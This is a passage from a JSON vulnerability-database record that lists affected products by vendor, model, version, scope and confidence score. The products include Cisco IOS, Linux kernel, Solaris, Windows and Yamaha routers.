        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(24\\)s2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sxd6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(18\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yk"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "1.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)ew4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(2a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)e12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4md"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)zj1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xh"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(26b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yn"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(29a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)ay"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "10.3\\(19a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5e\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)s1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)yu"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(5d\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(2\\)xa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)ew2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(7b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xf"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.17"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)sg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2bw"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(1\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(1a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14.5\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.19"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(2\\)xf4"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "3.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(8\\)db2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(16\\)b"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.35"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)xi3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(2\\)t4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(13\\)s6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)dc"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.28"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(5a\\)b"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)bc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)wx5\\(15a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xg2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(14\\)e9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yw"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18.2\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(26\\)eb1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xr"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)xa4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(23\\)sz"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xi"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xh"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3da"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xd"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "6.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(13\\)ia"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(10\\)da4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.4"
      },
      {
        "model": "catos glx",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "cisco",
        "version": "8.3"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "check point",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "extreme",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "force10",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "linux kernel archives",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "the sco group",
        "version": null
      },
      {
        "model": "seil/b1",
        "scope": null,
        "trust": 0.8,
        "vendor": "internet initiative",
        "version": null
      },
      {
        "model": "seil/neu",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "internet initiative",
        "version": "128"
      },
      {
        "model": "seil/neu",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "internet initiative",
        "version": "2fe plus"
      },
      {
        "model": "seil/turbo",
        "scope": null,
        "trust": 0.8,
        "vendor": "internet initiative",
        "version": null
      },
      {
        "model": "seil/x1,x2",
        "scope": null,
        "trust": 0.8,
        "vendor": "internet initiative",
        "version": null
      },
      {
        "model": "opensolaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "(sparc)"
      },
      {
        "model": "opensolaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "(x86)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "10 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "10 (x86)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "8 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "8 (x86)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "9 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "9 (x86)"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cisco",
        "version": "7.x"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cisco",
        "version": "8.x"
      },
      {
        "model": "connectra",
        "scope": null,
        "trust": 0.8,
        "vendor": "check point",
        "version": null
      },
      {
        "model": "vpn-1 power vsx",
        "scope": null,
        "trust": 0.8,
        "vendor": "check point",
        "version": null
      },
      {
        "model": "vpn-1 power/utm",
        "scope": null,
        "trust": 0.8,
        "vendor": "check point",
        "version": null
      },
      {
        "model": "vpn-1 pro/express",
        "scope": null,
        "trust": 0.8,
        "vendor": "check point",
        "version": null
      },
      {
        "model": "proxysg",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "6.1"
      },
      {
        "model": "sgos",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "4"
      },
      {
        "model": "sgos",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "5"
      },
      {
        "model": "sgos",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "6"
      },
      {
        "model": "windows 2000",
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "none"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(itanium)"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows server 2008",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(itanium)"
      },
      {
        "model": "windows server 2008",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows server 2008",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x86)"
      },
      {
        "model": "windows vista",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "none"
      },
      {
        "model": "windows vista",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "sp3"
      },
      {
        "model": "rt100i",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt102i",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt103i",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt105 series",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt107e",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt140 series",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt200i",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt56v",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt58i",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt60w",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt80i",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rta50i",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rta52i",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rta54i",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rta55i",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rtw65b",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rtw65i",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rtx1200",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rtx3000",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "srt100",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "fitelnet-e series",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "furukawa electric",
        "version": "fitelnet-e20/e30"
      },
      {
        "model": "fitelnet-f series",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "furukawa electric",
        "version": "fitelnet-f3000"
      },
      {
        "model": "fitelnet-f series",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "furukawa electric",
        "version": "fitelnet-f40"
      },
      {
        "model": "fitelnet-f series",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "furukawa electric",
        "version": "fitelnet-f80/f100/f120/f140/f1000/f2000"
      },
      {
        "model": "mucho series",
        "scope": null,
        "trust": 0.8,
        "vendor": "furukawa electric",
        "version": null
      },
      {
        "model": "ip38x series",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "ios 12.4 gc1",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "7.1"
      },
      {
        "model": "windows vista business 64-bit edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows vista edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "x640"
      },
      {
        "model": "ios 12.3b",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "email and web security appliance patch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "5.14"
      },
      {
        "model": "ios 12.4 xm3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4jk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 xz2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 95",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.4jx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "access gateway enterprise edition",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.1.100.3"
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "4.3.3"
      },
      {
        "model": "bigip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4"
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "5.2.4.3"
      },
      {
        "model": "ios 12.2yg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.3(7)"
      },
      {
        "model": "ios 12.2sb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista enterprise 64-bit edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2 sb2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3jec",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 54",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "rt140i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "opensolaris build snv 93",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.4xg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3yj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rt105i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "windows server datacenter edition sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "windows vista enterprise 64-bit edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3(1)"
      },
      {
        "model": "ios 12.4 t5e",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks contact center manager server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "7.0"
      },
      {
        "model": "ios 12.2sz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2sl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1aa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server enterprise edition itanium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "ios 12.3yh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista home basic",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2zh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "pix/asa",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.2(4.18)"
      },
      {
        "model": "networks self service video server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-0"
      },
      {
        "model": "ios 12.2yr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0s",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "stonegate high availability firewall and vpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.3.1"
      },
      {
        "model": "ios 12.3xi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "linux enterprise sp2 debuginfo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "ios 12.0xf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0 s12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "ios 12.0xm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20080"
      },
      {
        "model": "ios 12.1gb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos clr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.4"
      },
      {
        "model": "opensolaris build snv 121",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.1da",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3xb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server enterprise edition itanium sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "wanjet",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.0"
      },
      {
        "model": "ios 12.1xm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 xw10",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rtx3000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "bigip local traffic manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4.8"
      },
      {
        "model": "opensolaris build snv 99",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "messaging application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "0"
      },
      {
        "model": "linux enterprise sp1 debuginfo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "cms server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "15.0"
      },
      {
        "model": "networks ethernet routing switch 4526fx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "4500"
      },
      {
        "model": "ios 12.2zl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows xp tablet pc edition sp3",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "networks ethernet routing switch 2526t-pwr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "2500"
      },
      {
        "model": "rfc requirements for internet hosts communic",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ietf",
        "version": "1122:0"
      },
      {
        "model": "networks ethernet routing switch 4524gt-pwr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "4500"
      },
      {
        "model": "stonegate high availability firewall and vpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.2"
      },
      {
        "model": "windows vista business sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(18)"
      },
      {
        "model": "ios 12.3jl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks switched firewall sfa-6400",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "networks multimedia comm mas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "point vpn-1 pro/express r70.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "check",
        "version": null
      },
      {
        "model": "ios 12.3jea",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "stonegate ips sensor and analyzer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "5.0.1"
      },
      {
        "model": "windows vista ultimate 64-bit edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.4(5)"
      },
      {
        "model": "solaris 8 sparc",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "bigip global traffic manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.3.1"
      },
      {
        "model": "ios 12.4 jk4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks contact center agent desktop display",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-0"
      },
      {
        "model": "ios 12.3xw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista enterprise 64-bit edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": "networks ethernet routing switch 5698tfd-pwr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "5000"
      },
      {
        "model": "opensolaris build snv 100",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "opensolaris build snv 124",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "rfc requirements for internet hosts applicat",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ietf",
        "version": "1123:0"
      },
      {
        "model": "ios 12.2yf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 123",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2xr",
